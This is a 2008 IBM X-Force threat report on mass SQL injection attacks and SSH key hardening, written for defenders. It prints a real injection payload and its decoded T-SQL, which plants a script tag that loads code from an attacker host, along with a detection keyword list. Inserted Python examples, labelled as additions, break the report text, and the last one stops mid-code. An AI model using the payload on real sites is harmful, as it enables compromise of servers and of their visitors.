
June 2008

IBM Internet Security Systems


X-Force Threat Insight Monthly
Table of Contents

About the Report . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 01
SQL Injection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 02
Securing the Secure Shell – Advanced configurations and automation . . . . . 09
Prolific and impacting issues of May 2008 . . . . . . . . . . . . . . . . . . 25
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
X-Force Threat Insight Monthly
Page 1

About the report

The IBM Internet Security Systems™ X-Force® Threat Insight Monthly is designed
to highlight some of the most significant threats and challenges facing security
professionals today. This report is a product of IBM Managed Security Services
and the IBM Internet Security Systems (ISS) X-Force research and development
team. Each issue focuses on specific challenges and provides a recap of the most
significant recent online threats.

IBM Managed Security Services are designed to help an organization improve its
information security by outsourcing security operations or supplementing its
existing security teams. The IBM ISS protection on-demand platform helps deliver
Managed Security Services and the expertise, knowledge and infrastructure an
organization needs to secure its information assets from Internet attacks.

The X-Force research and development team provides the foundation for a
preemptive approach to Internet security. The X-Force research and
development team is one of the best-known commercial security research
groups in the world. This group of security experts researches and evaluates
vulnerabilities and security issues, develops assessment and countermeasure
technology for IBM ISS products, and educates the public about emerging
Internet threats.

We welcome your feedback. Questions or comments regarding the content of this
report should be addressed to [email protected].

SQL Injection

As today’s operating systems have hardened over time, attackers have turned
from attacking core operating system services to easier targets such as third
party applications, Web browsers, and Web services applications. Web
applications that are designed to interact with a database can be vulnerable to a
class of attacks known as Structured Query Language (SQL) injection [1]. SQL
injection occurs when a Web application fails to properly sanitize input received
from an external source. For example, a Web form that asks for a username
normally uses the given input as part of a database query. If this Web form were
vulnerable to SQL injection, an attacker could provide valid SQL in the
username field to cause the application to generate a database query that is not
the one intended by the developer. Instead, the full range of SQL functionality
is now potentially available to the attacker resulting in possible unauthorized
database reads, writes, or even the execution of arbitrary commands on the
vulnerable system.

Many Web servers return error messages that give hints of the underlying
database schema. These error messages can help an attacker craft their SQL
injection attack by revealing table and column names. This information is used
to build an SQL statement that accomplishes the attacker’s goals. However, even
without such assistance from the Web server, techniques known as blind SQL
injection can still be used to successfully compromise the Web server. Blind
SQL injection uses statements that return “True” or “False” instead of relying
on an error message. This approach also allows for a more automated, scriptable
methodology rather than having to manually interpret a variety of error messages.
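To make the mechanism described above concrete, here is an added example (not code from the report) using Python's built-in sqlite3 module. The first lookup builds the query by string concatenation, so the username field can rewrite the statement, including the kind of True/False probe that blind SQL injection relies on; the second binds the value as a parameter so the driver never lets it change the statement. The user table and inputs are constructed for the demonstration.

```python
import sqlite3

# Constructed sample data for the demonstration (not from the report).
USERS = [("alice", "s3cret"), ("bob", "hunter2")]


def make_db():
    """Create an in-memory database with a small users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def lookup_vulnerable(conn, username):
    """Query built by string concatenation: whatever the Web form supplies is
    parsed as SQL, so the submitter controls the WHERE clause."""
    query = "SELECT username FROM users WHERE username = '" + username + "'"
    return sorted(row[0] for row in conn.execute(query))


def lookup_parameterized(conn, username):
    """Same query with a bound parameter: the driver hands the value to the
    engine separately from the statement text, so no character in it can
    alter the statement."""
    query = "SELECT username FROM users WHERE username = ?"
    return sorted(row[0] for row in conn.execute(query, (username,)))


def compare(username):
    """Run one input through both versions and return the two result lists."""
    conn = make_db()
    return lookup_vulnerable(conn, username), lookup_parameterized(conn, username)


if __name__ == "__main__":
    # A normal username behaves identically in both versions.
    print(compare("alice"))                  # (['alice'], ['alice'])
    # A tautology makes the concatenated WHERE clause always true and dumps
    # every row; the parameterized query looks for a user literally named
    # "' OR '1'='1" and finds nothing.
    print(compare("' OR '1'='1"))            # (['alice', 'bob'], [])
    # Blind SQL injection probes: the concatenated query answers a True/False
    # question through the presence or absence of a result row, with no error
    # message involved; the parameterized query simply returns no match.
    print(compare("alice' AND '1'='1"))      # (['alice'], [])
    print(compare("alice' AND '1'='2"))      # ([], [])
```

The two probe inputs are what makes the blind technique scriptable: an application that renders a different page for "one row" and "no rows" is an oracle even when it never prints a database error, which is why the fix has to be the parameterized query and not merely suppressing error messages.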

Recent attacks
It is well known that there are certain parts of the Internet that should be
avoided by users who do not want to put themselves at risk. For many years,
users were advised to visit only well-known, respectable sites and avoid
untrusted sites. The theory was that untrusted sites might attempt to download
malware via browser vulnerabilities or social engineering. Trusted sites had to
maintain their reputation in order to stay profitable and therefore could be
relied on to avoid malicious activity. However, SQL injection attacks have
recently turned that adage on its head. Even reputable sites such as government
servers in the United Kingdom [2] and the United Nations [3] can be unsafe when
compromised via SQL injection.

Over the last several months there have been multiple coordinated and
simultaneous mass compromises of tens of thousands of Web sites [4]. These have
not been limited to just one platform or one application. Early attacks were
launched compromising Linux® Apache MySQL PHP (LAMP) systems. More
recent attacks have compromised Microsoft® Windows® IIS ASP SQL systems
and attacked phpBB installations. Some of these attacks have involved
IFRAMEs with JavaScript™ while others are outright SQL injection attacks.
Additionally, some SQL injection attacks have also been tied to the exploitation
of the Adobe® Flash® Player issue discovered by the IBM X-Force team earlier
this year [5].

It is important to note that the attackers are not exploiting vulnerabilities in the
actual Web server software (IIS, Apache, etc.), so it is not enough for Web server
administrators to stay up to date on vendor patches. Attackers are analyzing Web
application packages (written in .ASP, PHP, etc.) running on the Web server in
order to find SQL injection vulnerabilities they can exploit. In some cases, once a
vulnerable Web application has been identified, attackers use search engines to
automate the process of finding target sites using the vulnerable applications [6].
For each target candidate, SQL is injected into the database so that subsequent
visitors are shown custom HTML created by the attacker.

Sample payload
Here is an example of a payload used in a recent mass Web server compromise.
The payload was inserted into a parameter passed in the URL (the middle of the
hex string is abridged here; the original runs to several hundred more digits):

s=290';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x6400650063006C00610072006500200040006D00200076006100720063006800610072002800380030003000300029003B00730065007400200040006D003D00270027003B00730065006C00650063007400200040006D003D0040006D002B0027007500700064006100740065005B0027002B0061002E006E0061006D0065002B0027005D007300650074005B0027002B0062002E006E0061006D0065002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C0027002B0062002E006E0061006D0065002B002700290029002B00270027003C0073006300720069007000740020007300720063003D00220068007400740070003A002F002F0079006[...]%20AS%20NVARCHAR(4000));EXEC(@S);--

Here is a bit of Perl code that will decode the hex-encoded CAST parameter. The
hex is the UTF-16LE encoding of the NVARCHAR string, so every character byte is
followed by a 0x00 high byte that the decoder skips:

#!/usr/bin/perl
use strict;
use warnings;

# Decode the hex argument of CAST(0x...) one byte at a time, discarding the
# 0x00 high byte that follows each character of the UTF-16LE NVARCHAR string,
# and return it as the readable "CAST(" prefix plus the decoded SQL.
sub castsub {
    my $cast = shift || return;
    my $decoded = "CAST(";
    while ($cast =~ m#([A-Fa-f\d]{2})(0{2})?#g) {
        $decoded .= pack("C", hex($1));
    }
    return $decoded;
}

# Read the captured request (or Web log line) on stdin and print it with
# every CAST(0x...) replaced by its decoded text.
while (<>) {
    s#CAST\(0x([A-Fa-f\d]+)#castsub($1)#ge;
    print;
}

Its output looks like:

s=290';DECLARE @S NVARCHAR(4000);SET @S=CAST(declare @m varchar(8000);set @m='';select
@m=@m+'update['+a.name+']set['+b.name+']=rtrim(convert(varchar,'+b.name+'))+''<script src="http://[malicious_host]/0.js"></script>'';' from
dbo.sysobjects a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and
a.xtype='U'and b.xtype=c.xtype and c.name='varchar';set @m=REVERSE(@m);set @m=substring(@m,PATINDEX('%;%',@m),8000);set @m=REVERSE(@m);exec(@m); AS NVARCHAR(4000));EXEC(@S);--

The decoded output shows Microsoft SQL Server® database software code that
searches all the tables in the database for VARCHAR (i.e., text) columns and
inserts a piece of HTML that points back to the attacker’s host. When a Web
page is constructed from the contents of the modified table and served to a
visitor, the visitor unwittingly downloads arbitrary content from the attacker.

In the recent mass Web server attacks, the content served by the injected HTML
consists of browser exploits designed to compromise the visitor’s computer and
install a Trojan that can be remotely controlled by the attacker. The visitor’s
system then becomes yet another node in the attacker’s botnet and can be used
to send spam, search for more sites vulnerable to SQL injection, etc. At least one
set of attackers has used this mechanism to gather passwords for a massively
multiplayer online role-playing game (MMORPG) named World of Warcraft™ [7].
The attackers then compromise the World of Warcraft accounts in order to
launder assets from the game into real world currency [8]. These SQL injection
attacks have been extremely effective.

Mitigation
Unfortunately, attackers have many available options for remaining
undetected. There are multiple ways of disguising and obfuscating their attack
to prevent discovery. In order to prevent SQL injection, Web applications must
be scanned or audited for places where unfiltered user input is allowed through
to the database. This includes Web forms, URL parameters, and cookie values.
Where possible, use parameterized SQL statements so that the underlying
database driver can escape the harmful characters. Also, monitor Web logs for
intrusion attempts such as hex-encoded strings or SQL keywords such as
DECLARE, CAST, CONVERT, UNION, INSERT or UPDATE.
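The log-monitoring advice in the paragraph above can be turned into a small scanner. The following is an added example, not code from the report: it parses the request path out of Common Log Format lines, URL-decodes it, decodes any CAST(0x...) hex literal as the UTF-16LE NVARCHAR string it carries (the same decoding the Perl snippet earlier performs, here applied across a whole log), and flags the keywords the report lists. The log lines, IP addresses and the T-SQL fragment inside the hex literal are constructed for the example.

```python
import re
from urllib.parse import unquote

# Keywords the report recommends watching for in Web logs.
SQL_KEYWORDS = ("DECLARE", "CAST", "CONVERT", "UNION", "INSERT", "UPDATE", "EXEC")

# A hex literal handed to CAST(...), as in the mass-compromise payload.
HEX_CAST = re.compile(r"CAST\(0x([0-9A-Fa-f]+)", re.IGNORECASE)

# Common Log Format request line: method, path, protocol inside double quotes.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def decode_cast_hex(hexstr):
    """Decode the hex argument of CAST(0x...): it is the UTF-16LE encoding of
    the NVARCHAR string the attacker wants executed. A trailing odd nibble or
    odd byte (a log line truncated mid-payload) is dropped rather than raising."""
    if len(hexstr) % 2:
        hexstr = hexstr[:-1]
    raw = bytes.fromhex(hexstr)
    if len(raw) % 2:
        raw = raw[:-1]
    return raw.decode("utf-16-le", errors="replace")


def analyze_request(line):
    """Return a list of findings for one access-log line; [] means clean."""
    m = REQUEST.search(line)
    if not m:
        return []
    text = unquote(m.group(1))          # undo %20, %27 and friends
    findings = []
    for hx in HEX_CAST.findall(text):
        decoded = decode_cast_hex(hx)
        findings.append("hex-encoded CAST decodes to: " + decoded)
        text += " " + decoded           # scan the decoded SQL for keywords too
    upper = text.upper()
    hits = sorted(k for k in SQL_KEYWORDS if re.search(r"\b%s\b" % k, upper))
    if hits:
        findings.append("SQL keywords in request: " + ", ".join(hits))
    return findings


def scan_log(lines):
    """Map 1-based line numbers to findings for every suspicious line."""
    report = {}
    for n, line in enumerate(lines, 1):
        f = analyze_request(line)
        if f:
            report[n] = f
    return report


# Constructed sample log. The hex literal is built here from a short T-SQL
# fragment modelled on the report's payload; it is not the real payload.
INNER_SQL = "declare @m varchar(8000);set @m='';exec(@m)"
PAYLOAD_HEX = INNER_SQL.encode("utf-16-le").hex().upper()
SAMPLE_LOG = [
    '203.0.113.5 - - [12/May/2008:03:14:07 +0000] "GET /news.asp?s=290 HTTP/1.1" 200 5123',
    '203.0.113.9 - - [12/May/2008:03:14:09 +0000] "GET /news.asp?s=290%27;DECLARE%20@S%20'
    'NVARCHAR(4000);SET%20@S=CAST(0x' + PAYLOAD_HEX + '%20AS%20NVARCHAR(4000));EXEC(@S);--'
    ' HTTP/1.1" 200 5123',
    '198.51.100.7 - - [12/May/2008:03:15:01 +0000] "GET /about.asp HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for n, findings in scan_log(SAMPLE_LOG).items():
        print("line %d:" % n)
        for f in findings:
            print("  " + f)
```

The decoded-CAST finding is the strong signal; the keyword match on its own will also fire on legitimate paths such as an update.asp page, so tune the keyword list against the application's own URL space before alerting on it.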

If you suspect you have been a victim of the recent SQL injection attacks, you
can automate the database cleanup. A template for a Microsoft SQL Server site
might look something like this [9]:

DECLARE @BAD VARCHAR(200)
-- The injected tag to remove; DON'T GO HERE OR CLICK THIS LINK
SET @BAD = '<script src=http://[malicious_url]></script>'

DECLARE @T varchar(255), @C varchar(255)

-- Walk every text-type column (ntext, text, nvarchar, varchar) of every user table
DECLARE Table_Cursor CURSOR FOR
select a.name, b.name
from sysobjects a, syscolumns b
where a.id=b.id and a.xtype='u'
  and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
  -- Strip the injected tag from the current column of the current table
  exec('update ['+@T+'] set ['+@C+']= REPLACE('+@C+','''+@BAD+''','''')')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

In addition to Web application auditing, administrators should review their
remote access policies and verify that reusable passwords are prohibited in
favor of strong authentication mechanisms such as SSH “authorized_keys.”
Remote access to administrative accounts should be disabled entirely, with the
possible exception of tightly controlled applications and keys. To minimize the
risk of becoming infected when visiting compromised sites, client systems must
have the latest security patches applied for browsers and plug-ins (Flash,
Realplayer™, etc.). Additionally, “ghost” accounts (expired accounts or accounts
whose individual owners are no longer present) should be removed.

The IBM ISS signature “SQL_Injection” heuristically detects SQL injection.
Some Web applications are coded to use SQL injection in database transactions,
so before enabling blocking for this attack, please see KBA 4748 for tuning
suggestions [10]. Additionally, the IBM ISS signatures “HTML_VML_Heap_Overflow”
and “Upx_Packed_Executable” may trigger when clients browse infected Web servers.

Public defacement, confidential data leakage, and database server compromise
can result from these attacks. Complete compromise of vulnerable client systems
is also possible. It is imperative that organizations treat SQL injection
vulnerabilities as a serious threat and address them accordingly.

Securing the Secure Shell – Advanced configurations and automation
Part three of a three-part series on Securing the Secure Shell, SSH.

Introduction
Part 1 of Securing the Secure Shell focused on the history of the Secure Shell
(SSH), the problems with ongoing compromise of SSH servers through
compromised credentials, and the problems rife with the use of reusable
passwords for access to SSH services. Part 1 also introduced the use of SSH
authentication keys and the elimination of reusable passwords on public facing
servers. However, SSH authentication keys alone are not a panacea for securing
SSH, and authentication keys have their own set of problems that must be
recognized and addressed. Part 2 of this series examined securing and managing
SSH authentication keys through ssh-agent and other mechanisms. Part 3
expands on the authentication mechanisms and examines how to address complex
configurations between remote systems, provide authenticated superuser access
and apply these techniques to automated applications and processes.

The problem set (part 3)
SSH authentication keys are a convenient way of hardening access to SSH
services, especially on remote servers that are accessible to the greater Internet.
A key agent makes these keys even more convenient for multiple connections
while keeping the private keying material secure. While this addresses first
order connections from a secure client to a remote server, it still leaves a
number of common administrative tasks unaddressed.

Administrators frequently require access to the superuser account on remote
machines to perform a multitude of administrative tasks. While there are
established means for providing that access, they currently require passwords,
either a shared superuser password or the user’s password, in order to grant
access. Elimination of reusable passwords in conjunction with SSH has been
the overriding goal of this series.

Often, remote server to server access is needed. This may be for backup
purposes, for performing a hotsync between redundant servers, or for migrating
virtual machines from one physical host machine to another host. These kinds
of access may require large bulk transfers of data. Manipulating small files on
multiple remote servers from a single secure vantage may be practical but
performing large bulk transfers, such as backups, is not. This type of transfer
doubles the amount of net traffic and sends it through longer connections with
smaller bandwidth pipes through security perimeters on its way to and from the
client. This can clog remote connections and degrade network service. Some
server to server tasks can be performed using unprivileged accounts while
other complex tasks require direct root-to-root and server-to-server activity.

Additionally, many administrative tasks, such as backups, need to be
automated. This has often been done with private keying material present on
one or more servers, often with no password. These are the sorts of security
holes that result in a rapidly spreading compromise between systems when only
one system is initially compromised.

SSH agent forwarding
SSH agent forwarding provides a powerful tool to forward authentication for
second order, third order, and higher connections from remote systems back
through multiple hops to the secure client where the SSH agent is operating.

Forwarding can be designated on a connection by connection basis from the
client and extended out through a variable number of hops before being
discontinued. The controlling agent is also not required to be directly on the
client workstation but may be one or more hops away from the client on an
intermediary server and may be controlling a subset of connections.

[Figure: two diagrams. “Orders of connections”: the client system runs the
ssh-agent; a 1st order SSH connection goes to a remote server, and 2nd, 3rd and
4th order SSH connections continue from remote server to remote server, each
with its authentication forwarded back to the agent. “Higher order connections
with intermediary key server”: the client system makes a 1st order connection
to an agent server (Little Black Box) running the ssh-agent, and the 2nd order
and higher connections from there to the remote servers are authenticated by
that agent.]

Problems with SSH forwarding
There is some risk with blindly forwarding all SSH authentication requests. An
attacker on a compromised system could take advantage of ssh-agent forwarding
to attack other systems. All that the attacker needs is read/write access to an
active authentication forwarding socket, which, on UNIX® systems, is usually in
the form of a named pipe. The attacker would have to have already compromised
the user’s account or the root account on the system in order to do this.
Consequently, compromise of the authentication forwarding is probably the least
of the user’s problems. An attacker with that level of authority can do far more
damage and accomplish much more in the way of planting Trojans or otherwise
compromising and gaining access to the user’s account.

To manage forwarded key authentications, the ssh-agent on UNIX supports
several control mechanisms. The agent itself can be “locked” with a simple
password when the user does not wish to allow any agent authentication. The
password must then be reentered to unlock it. Unauthorized authentication
requests can then be easily blocked and detected. Because the locking
mechanism is part of the authentication protocol, the agent could be locked
remotely through a forwarding connection. In theory, an attacker could attempt
this with an unwitting user, but this activity would be an obvious giveaway that
something was amiss.

Individual keys may also be added to the agent on UNIX with a “confirm”
option. When flagged as confirm, a pop-up window will appear any time the
key is used for authentication. This does not require a password, but merely an
“ok” or “cancel” to allow or deny the authentication attempt. The pop-up is
managed by a handler which can be specified to the ssh-agent at the time it is
started. Using this mechanism, a script may be specified to manage the key
confirmation in complex configurations or for automation.

SSH agent locking and confirmation work differently with Windows clients than
with UNIX clients. On UNIX, one agent can serve any number of clients and is
server agnostic with regards to the keys it serves. Windows clients generally have
built in agents that are aware of the servers to which they are connected and can
specify which keys are available to which servers over forwarded authentication
connections. This can create problems where multiple keys are required for higher
order connections to other servers. To get around these limitations, Windows
clients may have to work through intermediary systems in a layered approach with
SSH agents providing the necessary depth of keys for complex configurations.

Overall, the risks from ssh-agent forwarding are minimal and it provides a
powerful mechanism to keep sensitive keying material safe, even across
multiple connections. What little risk remains is manageable.

Superuser access
Superuser or root access is often a thorny administrative problem. On one hand,
multiple people may need limited or unlimited access to the root account. On
the other hand, this access needs to be protected and audited. It is a very
common practice to forbid unlimited remote root access and to force users
requiring superuser privileges to authenticate as themselves and then elevate
their privileges to that of root. This task generally requires a reusable password
of one form or another and the practice of employing reusable passwords should
be avoided when possible.

Granting access to the superuser account always entails some risk and can be
difficult to log and audit, owing to the power of the superuser to alter the logs. Even
without SSH involved, it is generally advisable to provide for an autonomous logging
server to which all security events are logged. Access to the logging server is then
forbidden to accounts with access to the servers that are being serviced by it. In this
way, even if a superuser account on a server is compromised, the logs leading up
to the compromise are available for audit and cannot be tampered with. This can be
accomplished with even a very lightweight “little black box” at each remote site.

One older, common utility for granting root access is the “su” (also referred to
as “Super User,” “Step Up” or “Switch User”). This command requires the user
to authenticate as the target user (it can switch to users other than root as well).
Anyone using this command to become root must, therefore, know the root
password. This could result in significant consequences for an organization.
Reusable passwords are bad enough. Shared reusable passwords are on an
entirely different – and worse – level. Use of the “su” command should also be
avoided whenever and wherever possible.

A superior command for providing superuser access is the “sudo” command (or
“super” on some flavors of UNIX). This command allows an unprivileged user
to run a command or a shell as root. Which account or group is allowed to run
what commands is controlled by a central configuration file “sudoers.” To use
sudo, an authorized user must authenticate with his or her own password. Sudo
remembers which users have authenticated and does not require reentering the
password for every command. While sudo provides all the functionality of su
along with much finer grained access control, sudo still requires the use of a
reusable password, or no password at all for members of special groups such as
“wheel” if so configured. This is much better than “su” but the goal is to
eliminate the vulnerabilities that are inherent in the use of reusable passwords.

Another option is to use SSH to the root account on the local host. This has
several differences from su or sudo with some advantages and some
disadvantages.

• Advantage: Access to the root account can be locked down and restricted to localhost
only using options in the root authorized_keys file.
• Advantage: It can be as fine grained and versatile as sudo.
• Disadvantage: It takes more effort to set up and configure for complex combinations
of commands.
• Disadvantage: Unlike sudo, it does not preserve the current working environment,
such as current working directory.
• Like su, it acts as a new login as the root user. This could be either an advantage or a
disadvantage depending on the application.
• Auditing of superuser activity must take into account the SSH connections and the user
of origin. This is neither an advantage nor a disadvantage but an operational note.

Combined with ssh-agent forwarding, access to the superuser account is only
available when an appropriate session is connected from a client bearing the
private keying material and forwarding authentication. Unlike either su or
sudo, no reusable passwords are required and no access to the superuser
account is possible outside of when a legitimate account is connected.

[Figure: “SSH authenticate root access”: the client system with its ssh-agent
makes a 1st order SSH connection to the user account on the remote server; a
2nd order SSH connection from that user account to root on the same server is
authenticated through the forwarded agent.]

Server to server access
Server to server communications and data transfer is another area of concern.
Often this involves large scale bulk transfers of backups, images, or hot standby
data that would otherwise clog the more limited communications channels
going into and out of a secure control point. It makes little sense to transfer
gigabytes of data from a server into a secure system and then back out to
another system sitting right next to the source server. Some of this data may be
no more than back and forth data between two non-privileged users on those
boxes. In some rare cases, some of this traffic may require direct root to root
data transfers to deal with privileges and permissions. To facilitate server to
server communications, a common practice has been to maintain private
keying material on one server or the other to authorize connections. This
requires strong passphrases on the keying material lest it expose both servers
should one or the other server be compromised. Because of this cross-
vulnerability, maintaining private keying material in this manner is a
suboptimal and risky method.

In the less complicated case of server to server communications with non-
privileged accounts, the communication can be simply handled through
ssh-agent forwarding. The private keying material remains behind secure
perimeters and authentication for second order or higher connections between
servers is simply forwarded back to the agent. With this method, no private
keying material is present on the external servers and no access between
servers is possible when the appropriate client is not connected in a session.

The case where server to server communications is required with root to root
access is far more complex. With superuser access on either system, there is risk
to the system outside of the domain of the maintenance tasks at hand. This is an
asymmetrical risk. If the client system can only read from the server system,
then it is incapable of modifying the server system and risk is limited to
inadvertent information disclosure. If the client system can write to the server
system the risk is manifestly greater due to the ability to modify configurations
on the target server.

SSH provides for “forced commands” as an option in the authorized keys file.
When a key is specified with a forced command, only that command executes
for that key. That command may, in turn, execute the requesting command, or
it may deny access entirely. An example of this is the rrsync script (Restricted
RSYNC) available in the rsync package. When using the rrsync forced
command, only rsync is authorized and directories can be specified as read only
or with read/write subdirectories. With this, the command is limited and the
data flow is limited, preventing even rsync from overwriting the control files
which limit its behavior. For a backup process, this could be used to either limit
a backup client to receiving data (pull mode) or to limit a backup client to
writing data only to a designated backup area (push mode). More complex
scenarios are possible using a variety of openly available shell scripts for this
forced command.

The restrictions imposed by SSH forced commands are contained in the
authorized_keys file, which is normally a file users can write to. Commands
permitted to a user should not include the ability to overwrite the configuration
files that impose these restrictions. In situations where this is an issue, the file
may need to be relocated to a non-standard location or otherwise secured from
unauthorized alteration and managed from a secure management site.

Filtering the SSH service
Because outside access to the SSH service in general is desirable for non-
privileged accounts, it becomes difficult to filter access for the root account. As
mentioned earlier, an option available for the authorized keys file is to specify
from where the key is valid. Keys provided for data transfer between two
systems can be restricted to just those two systems, in addition to restricting
what commands they can execute. Commands granting general superuser
privileges can be restricted to only commands coming from the local system,
forcing a legitimate login with legitimate SSH authentication as a prerequisite
for access to the root account.
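The controls described in this section and the two before it (forced commands such as rrsync, the from= host restriction, and the earlier note that root access can be limited to localhost through the root authorized_keys file) are all expressed in the option field of an authorized_keys line. Here is an added example, not code from the report, of a Python audit of a root authorized_keys file against that guidance. The option field needs a real parser because values may be quoted and contain commas, so a naive split on commas breaks; the audit then reports keys without a from= restriction and keys that grant an interactive root shell from non-local hosts. The sample file, key blobs and finding messages are constructed; rrsync is the restricted-rsync script the report mentions.

```python
# Key types OpenSSH uses in the key-type field of an authorized_keys line.
KEY_TYPES = ("ssh-rsa", "ssh-dss", "ssh-ed25519",
             "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")

# Sources that mean "the local system only" for a from= restriction.
LOCAL_SOURCES = {"127.0.0.1", "::1", "localhost"}


def _option(item):
    """Turn 'name=value' into (name, value) and a bare flag into (name, True)."""
    name, sep, value = item.partition("=")
    return name.strip(), (value if sep else True)


def parse_options(field):
    """Split an authorized_keys option field on the commas that are outside
    double quotes and return {name: value}; quotes delimit a value and are
    not part of it, and a backslash inside quotes escapes the next character."""
    options, buf, quoted, i = {}, "", False, 0
    while i < len(field):
        c = field[i]
        if quoted and c == "\\" and i + 1 < len(field):
            buf += field[i + 1]
            i += 2
            continue
        if c == '"':
            quoted = not quoted
        elif c == "," and not quoted:
            options.update([_option(buf)])
            buf = ""
        else:
            buf += c
        i += 1
    if buf:
        options.update([_option(buf)])
    return options


def parse_line(line):
    """Parse one authorized_keys line into its options, key type and comment;
    return None for blank lines, comment lines and malformed lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.split(None, 1)[0] in KEY_TYPES:
        options, rest = {}, line          # no option field on this line
    else:
        quoted, end = False, None         # option field ends at the first unquoted blank
        for i, c in enumerate(line):
            if c == '"' and line[i - 1:i] != "\\":
                quoted = not quoted
            elif c in " \t" and not quoted:
                end = i
                break
        if end is None:
            return None
        options, rest = parse_options(line[:end]), line[end:].lstrip()
    parts = rest.split(None, 2)
    if len(parts) < 2 or parts[0] not in KEY_TYPES:
        return None
    return {"options": options, "type": parts[0],
            "comment": parts[2] if len(parts) > 2 else ""}


def audit_root_keys(text):
    """Check a root authorized_keys file: every key should carry a from=
    restriction, and a key with no forced command (an interactive root shell)
    should be usable from the local system only."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        entry = parse_line(line)
        if entry is None:
            continue
        opts, label = entry["options"], entry["comment"] or "line %d" % n
        source = opts.get("from")
        if source is None:
            findings.append((label, "no from= restriction: key is valid from any host"))
        local_only = source is not None and set(source.split(",")) <= LOCAL_SOURCES
        if "command" not in opts and not local_only:
            findings.append((label, "interactive root shell reachable from non-local hosts"))
    return findings


# Constructed example file; the key blobs are placeholders, not real keys.
SAMPLE_ROOT_AUTHORIZED_KEYS = """\
# root's authorized_keys (constructed example)
from="127.0.0.1,::1" ssh-rsa AAAAB3NzaC1yc2EXAMPLE1 admin-root-via-localhost
from="192.0.2.10",command="/usr/bin/rrsync -ro /srv/backup" ssh-rsa AAAAB3NzaC1yc2EXAMPLE2 backup-pull
command="/usr/bin/rrsync /srv/incoming" ssh-rsa AAAAB3NzaC1yc2EXAMPLE3 backup-push
ssh-rsa AAAAB3NzaC1yc2EXAMPLE4 old-laptop
"""

if __name__ == "__main__":
    for label, problem in audit_root_keys(SAMPLE_ROOT_AUTHORIZED_KEYS):
        print("%-28s %s" % (label, problem))
```

In the sample, the localhost-only shell key and the pull-backup key pass; the push-backup key is flagged because its forced command is not paired with a from= restriction, and the stray laptop key is flagged twice because it is exactly the unrestricted root access the section argues against.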

The exception to this may be in the case of using Internet Protocol Version 6
(IPv6) for remote access. With IPv6, it is possible to block all non-local Internet
Protocol Version 4 (IPv4) access while allowing traffic between servers to take
place over IPv6. While this is possible in a pure IPv4 environment, it requires
complex filtering and firewall rules and is much more difficult to implement.

Automation
Many management tasks in the UNIX world are automated and that presents a
vexing problem with SSH. Reusable passwords are bad. Reusable passwords in
scripts and automation are worse and even passwords on private keying
material are useless when the password must be buried in a script. The problem
is compounded when the keying material and the scripts are present on a
remote system to access other remote systems. When there is no interactive
input from a user, there must either be no password or the password must be
available to the automation process, and thus available to an attacker. For this
reason, the private keying material and the automation process must be secured
by other means.

One option for securing automated processes and keying material is to employ a
Little Black Box, or LBB for short. The LBB is secured through multiple means.
Filtering and access controls limit who can access the system, and it should be
maintained in the most secure areas of the local net. It is of limited
functionality and low profile, offering no services other than the limited
connections for authorized user access.

The LBB shown here is an inexpensive fanless box with an internal hard drive
that only draws five watts of power. Even with only 256MB of RAM, it is more
than capable of orchestrating management jobs on a multitude of remote
systems. It has two Ethernet ports, and a serial port for communications. The
two USB ports can support multiple memory devices, smart cards, and a
console. In the foreground is an 8GB USB memory stick (red) and a USB
cryptographic smart card (blue).

An automated process running on the LBB can, at run time, set up appropriate
authentication agents and load them with the necessary keys. It can then
connect to the remote systems using an unprivileged account to kick off the
jobs that would have previously been started by “cron” on those remote systems.
It may connect up to root on the local host, authenticated through the agent
forwarding as described in a previous section, and subsequently initiate server
to server tasks such as backups as restricted by various filtering limitations and
forced commands on the destination server.

Automated processes can be hardened further by having a script on the LBB
confirm each key use. Each step of an orchestrated process is assigned its
own key, and a confirmation process on the LBB approves each use. The keys
must be used in their assigned order; a key presented out of sequence, or
twice in a row, is refused. An attacker who tries to misuse a key through a
forwarded agent is therefore detected immediately as an out-of-sequence
access. When the process is not running, the keys are not loaded and access
is impossible; when it is running, the keys are available but their order is
controlled and abuse is detectable.

The technique of orchestrated, sequential processes can be taken one step
further by implementing the confirmation agent as a “finite state machine”.
Using multiple keys, the confirmation agent can regulate the start and
finish of operations and transition through complex operations while adding,
deleting, and enabling keys dynamically.
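
The following Python confirmation program, added here as an example rather than taken from the article, implements that sequence check. It assumes the keys are loaded with ssh-add -c, so that ssh-agent runs the program named by SSH_ASKPASS before each use, passes its prompt (which includes the key fingerprint) as the first argument, and treats exit status 0 as approval; the LBB_KEY_SEQUENCE and LBB_SEQ_STATE variable names are invented for the example.

```python
#!/usr/bin/env python3
"""Sequence-enforcing key confirmation for ssh-agent (added example).

Keys loaded with `ssh-add -c` make ssh-agent ask before every use: it runs
the program named in SSH_ASKPASS with the prompt as its argument and allows
the operation only if that program exits 0. Each request starts a fresh
askpass process, so the position in the sequence lives in a small state file.
"""
import json
import os
import re
import sys
import tempfile
import time
from typing import Dict, List, Optional

# Assumption: the prompt contains the key's fingerprint, either the newer
# SHA256 base64 form or the 2008-era MD5 colon-hex form.
_FP_RE = re.compile(r"(SHA256:[A-Za-z0-9+/=]+|(?:[0-9a-f]{2}:){15}[0-9a-f]{2})")


def fingerprint_from_prompt(prompt: str) -> Optional[str]:
    match = _FP_RE.search(prompt)
    return match.group(1) if match else None


class KeySequencer:
    """Allow each key exactly once, in the order the orchestrated job uses them."""

    def __init__(self, sequence: List[str], state_path: str):
        self.sequence = sequence
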